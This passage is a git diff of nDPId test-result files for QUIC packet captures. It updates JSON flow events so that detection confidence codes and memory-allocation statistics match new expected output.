+86w=="} 
-00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":992,"flow_first_seen":1607938456563,"flow_last_seen":1607938456578,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1279218,"flow_avg_l4_payload_len":1289,"midstream":0,"thread_ts_msec":1607938456578,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":992,"flow_first_seen":1607938456563,"flow_last_seen":1607938456578,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1279218,"flow_avg_l4_payload_len":1289,"midstream":0,"thread_ts_msec":1607938456578,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","packets-captured":992,"packets-processed":992,"total-skipped-flows":0,"total-l4-payload-len":1279218,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1607938456578} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 992/992 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908385 bytes -~~ total memory freed........: 5908385 bytes -~~ total allocations/frees...: 119127/119127 +~~ total memory allocated....: 6042019 bytes +~~ total memory freed........: 6042019 bytes +~~ total allocations/frees...: 121889/121889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2144 chars diff --git a/test/results/quic-34.pcap.out b/test/results/quic-34.pcap.out index 60232247c..1acdd25de 100644 --- a/test/results/quic-34.pcap.out +++ b/test/results/quic-34.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1646827637244} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646827637244,"flow_last_seen":1646827637244,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1646827637244,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1646827637244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1646827637244,"pkt":"CAAnfrFjCgAnAAAACABFAgUATWVAAEAR9m3AqDgBwKg4xtpIEVsE7ChNxv8AACIIoSj95jI1XLcIjUy3QAcovkkARMqtPUg7uXRSK4kMXX53Es5onLzxtRemVGyuMExaFbMut6vDuqB2U\/DpzOfUlq0FvRt9rUJpjW6yDtUJ\/70ztz+CDYIV8VpKhQLQtYfPD3mmkKn2FxkrrQO4KafazVucb4cvV7T4N0u43AnJcMtc4d\/GXnMaac4VfAlfHe4y11Dgg0O+0aKijzEWoPXxyRR4t51aC7Nkbv\/0J5dgWKDBQk9w37dytb5zwjbfQHpRVluNBzZHs5I4DMZ\/JnNB+PrUyuyBmXrp0gR2XnwVjzQ3flNPFgcQgu2\/JTVF0L13Ckxt\/+QZlc9B3wBoysEquMpFluVCxlhpsJNoFK7jPg3r2c+uxRQG0p8pcZpnvTksWL+f8WqFT5coLPPdZlZwBn02RKfGTA+uAZ0LaE0O1ka34WEpgqpoVc8fayaTadrjLyO\/JlS+dq\/Kdd3y9KPe38jjexcirOrW1+qlPzhwIx8piSprhOCyEQY2+fljrQNCpUoPKvzdasj+8Y\/vgOi4aANXTAspd+NPZCshlwQpGBYQdC7CEZbf5QlwUnySFyecnPIsokfcy7EJCJxGVFXATop39f5agqqDgJBBxbV7Vy06FK1qkx\/0u8uhGfVjqVKRKmprwi9X1kSSqhXt2GH8bZxjiM01oC4BQV78N199Rg9tYJupRv8l6yvhDS9rct08zWWNVxr58lebQUaKNYadQRmZaFtRmnN0sxjkvcxweUxbZooL7E4GGIqIljR4ZhLlzlK3E7B66OJGtQAC7VyR46GafnwhTxp3HrOyLyoZp0Rw7xcWItz9Tv6lT2BoA4Y0DSNY9olTp+DPyrMnUG0vqRxzRhJ8374jg6MVKZMEa\/87MY2irhA8kK8hZoC3M19FTaOnneltuWAhMrf+Q8t8BAlD7kUkH6oHx9vkYnEZiK9+\/sfx6Qq8taGMG\/mcWDWaYEb3NXAZqmf41FHteU\/OwdmlZSqoqDS5DlVhB2wq7tLwmLKxoxTkhjVXaunTU\/kfczBDm1AwklxFw3Hw5J5l+LHrwOolcProF6qLDBkbDOvOptyE1ll3vB0t4SH06Wr36sHzRz1uCQR21A9SHZvKyJK\/SCg1uApsLqdmJZ1f\/+1id8zTEwjq1qmsHED38lQ4CrlbWfoLvOR3f3s\/z\/QkitvfGtHhVZt0j0WepakKe07\/NGHX1V0dM0mTgqZKJh2Io3kvFvctAo6sUjbANXF0S8wxlOujZbFzW1LOki1CXDYWdPlq+SJtyeBxUEDNzFZ71VrbnwsnJNOpHvvMzPqdRV+ndVLZfpyQXSEsFc65QVoQNOu0MGerIkZa7wLe0y4mX0pnI8L\/R\/y1JTawqiJeeUx8r1l44ku\/g3ZE2uSVEJxuuTdY8TSHXRMxr7nqZuOWpvSIaUcGS3Q1TZnsiOTFYcvBWzEbQ72OmSRWUJzCCABBzidjiDpGWzPkhe8\/ROyjlc\/5TRQg67rXC2fAj53uXQRWw3a6jszT4xodZsJKooKIos5G3CpYzzQ
SJCrtOeOr5\/ce4c+q3Hx2rzKhdgv5WRhVAr2UV23TNUJd0OkmVeoZzs9v+FDb0PtPPYVDKHvjJqHAzOy1dUyjTbdc+UjRQ\/Xh3vEMPhsnnFc+0+ln6b2hntZL0z9eF8yMJK4KNw=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646827637244,"flow_last_seen":1646827637244,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1646827637244,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646827637244,"flow_last_seen":1646827637244,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1646827637244,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1646827637247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1646827637247,"pkt":"CgAnAAAACAAnfrFjCABFAgUAqq4AAEAR2STAqDjGwKg4ARFb2kgE7EgDif8AACIIjUy3QAcovkkIkbyxu2YmbzcAQJwuFyenENUqJ+JAUUd0pzPM6YfLXJbr4Ls6WaBQnpeEVYscLYmqST86NZIZE4bUhuMV7nVVeeqYe8GuuwtatPAGGTW6q7p5GlzaMgwDpbi8BdNdLtW13Hqdt9WnjpqVBlTPXGjJKFNPYUL1p5wtvsDZQ4TlC3npqKXhES1sS6J094lDKZtXU+v7T8eCFSNuI7Td4nHjGGqNqUKgJSus\/wAAIgiNTLdAByi+SQiRvLG7ZiZvN0QVSPjoxHY6BY1VSgy5etewIoW+11THSEpbinUyFsFkXsGASC8punYhUcJKCOC4rBIzaCstKMtMJHeFT+sUXNNib04LBnzYQKYceojlYPsGe5Ro3OtptLvx4kbgnpc62cqQ1nxvDHT\/fJKWJpgJvoU08oiVUiGs3B1bAvXl\/Wd+wkAF\/wAEMtHf7gZ1kaIq4RaPvn5a9A7UzqeEBuYGDShEpWXMe8q8vuDy24QsQNetariaa4kyNHYl4QdNhygXx\/G6ImAU3U1WThFZHC7AGd0gIgLIGzJf\/9m58rpSdM8Ie6D0sH7LUz+QS+Z4XNqqQcfZPaTaAVOFR6VUyiMeaj3F8bkj\/3MFBH1Z7mXRy8N0qVksEG1OlaU1eLaFjqcM9ZlnatIXhDVNsU98jz1VfTd5sFlnZuyyy7JoZ94aXeRH\/zazdoWlaXePukQ+pl9yYFQPdkgJYi+xKQurw0sw\/SIjNt6qV1Kt0\/FKxwfio1WQ7xlNXzsikFbr81oDdnzQYE6rGMYuxy0RnbfRhLVdsGTc9\/tp7zhIS4DV21JLjrv9UwKPcwJ4JD\/1Rxmkn3Jgw\/xQKXSa6JKSiLv0t\/weF0kbZssWUTcVDcUkDhsJSAH0njJoT2cFwm4lWcM5\/27nvncmYaxDvQXBfFPVW+m3Kwufpk8Xq\/eZbeo\/gSSLUYZOuQu+1ySiHDi5lLzsrpugFKrtUw8ayavMdKrm7oT2ZHXYsRczEGy\/6j7hln+rc24EWxZc0x2eirzNMVxj
gu\/0CooTXqD4vghqN1FykIiDm0ZniCVUNexnbGWB7jTgFGcio0\/OnikmQ4dYt56aiM9sIGNcOvsTnFVh+cqJS5HY98vC1U2OBDew6qoIOHDQ21GKLwwRZV1T6U5f6o+37jaPoC1trLLadI2tORnFYqRZm7glwbD9lNFVr+PbofAndUgCf6Zk2CDaE686Awtk3d4hYhQQ3WNznovhVpr8uhbkmAY+WL7y023sNxtRIBnWlXFZPHQuiB37VW1mvmc13p6ljSnKt94wjvyH1FOprPa3tga3zWcYEvWdg5Xqw1ju7gmEzi+VGOvWFAXTzHEhgyFz4BPL84om6p0ALU6sMz8ZdCVqy3kojlACSWsh5\/A6tV3eZJDcnfn7IV6RS+dpvmNwYoFMJn6YSfH1ddeM9mWwCcbnxFV4aWagX1z8fcqVLI6IMYAb37L0\/zdSO2uZe\/h4kSA2SLJTWfPj+TnqT2qI8MlPDZYgXs2XiIdxOOzSUnZDmRgGIMADHBZPrEl6WERC1eVKU\/qCzCib8\/Q0YyKXEfqbm+ia9lXh1\/rbg1B\/\/CXdzCHVzZc3ir8TnofN+5SG6M6PapINQPVY7HwnTlqNqDNVMVGtlLYsPe7LMJnAoGEI2aKSrQZRaA=="} 01412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1646827637247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":766,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":766,"pkt_l4_len":732,"thread_ts_msec":1646827637247,"pkt":"CgAnAAAACAAnfrFjCABFAgLwqq8AAEAR2zPAqDjGwKg4ARFb2kgC3Huyr\/8AACIIjUy3QAcovkkIkbyxu2YmbzdBBIfexsm7espBXzGKaZrAS7pggZDUUIfbdQ\/09SYdxmJiPOboVA5GNyIN0WKEZEb2ChDB1GilmJgW7Qp24EMucpJ8B17AVuDTPfEx7nyxUZnDxLnOV1NZxSPDEwEtlJluh20qRikrub3PX5DmXIcRaHLRejZJ9hsaCYWsq6n5Gfas0GF7MLGzHn117Y0pGUO2eqVFiwenMssI9+ug1E1aDiNVvZMQKSFdyDe9LiLFeCdes2+kAlg73TsTCPbewTMdEgVZBgLZaqO0un1mix5Qt6BKTBkVA8VSZ95v+EfSMYEwA9xZi0jAFqqTGyp+ZP95tU0r4nGCl85tIQDBKXfcBXQge764C41Mt0AHKL5JAwe7F8jwhPqhtghmuHu5o5uyPLm0TwLbmCTREzsDZ3DsGt5qVRU9QIvOhWBrh4V4uljh\/BtTxVptxRkCktu+NWT04G8qsIYXDgRKJUfYMbGUdCKTsE7gC0FAzqopaBfgolmLGZhX7ZxOjTG5NpEGFq+sEmPjGPlDauhq8NTECzVYfToMEehRp8C3bVLHR8m\/W+k90FLQ1TlaEbOqjuZyM\/9ouIFSCmQMPUymc3wxlPi0V28D1yaErAIjX4TP0GolGAZO78ybzC72YMWFqgmnosw3ju1DxFOnMm4S5978OZU\/wmbSWd91srzQp2fOyLvD3wvvNCgP73nEBs88atgYEK5VcrbDFNBrhyEvYixxRMTIqYTLkuWudZVMFEpbA6nhu6WPpaKYD3hORyKUUBLP\/t\/DIvXUYAsZ4s7fmfApFG7wJnzGak9JU7Tkzy0XAM9yEGedigZBltqQA4wPLvuXascBjTXzqxcRPwVbbiOpsQwIpMGnMJz4+XgHNI2WaH8iPl9
H\/sYwWUugeEAk511PGx++JwUxDqTYxBlG36Eym55D9c1vN\/8RDw+9AAMguw=="} -00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646827637244,"flow_last_seen":1646827637247,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4668,"flow_avg_l4_payload_len":1167,"midstream":0,"thread_ts_msec":1646827637247,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646827637244,"flow_last_seen":1646827637247,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4668,"flow_avg_l4_payload_len":1167,"midstream":0,"thread_ts_msec":1646827637247,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"quic-34.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":4668,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1646827637247} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879835 bytes -~~ total memory freed........: 5879835 bytes -~~ total allocations/frees...: 118139/118139 +~~ total memory allocated....: 6013469 bytes +~~ total memory freed........: 6013469 bytes +~~ total allocations/frees...: 120901/120901 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2142 chars diff --git a/test/results/quic-fuzz-overflow.pcapng.out b/test/results/quic-fuzz-overflow.pcapng.out index 419eb2d19..0bba4ec95 100644 --- a/test/results/quic-fuzz-overflow.pcapng.out +++ b/test/results/quic-fuzz-overflow.pcapng.out 
@@ -2,8 +2,8 @@ 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1633957625000} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3} 
03011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633957625000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1280,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":1280,"pkt_l4_len":1260,"thread_ts_msec":1633957625000,"pkt":"RSAFACAgIAAgESAg\/\/\/\/\/\/\/\/\/yAgICAgICAgIMhRMDI0ICAgICAgICAgICD\/\/yD\/\/\/\/\/\/yAgIAAAoAEgBENITE8gACAgVUFJRP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAg\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
AgICAgICAgICAgICAgICAgICAgICAgICAg\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICA="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 
-00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 
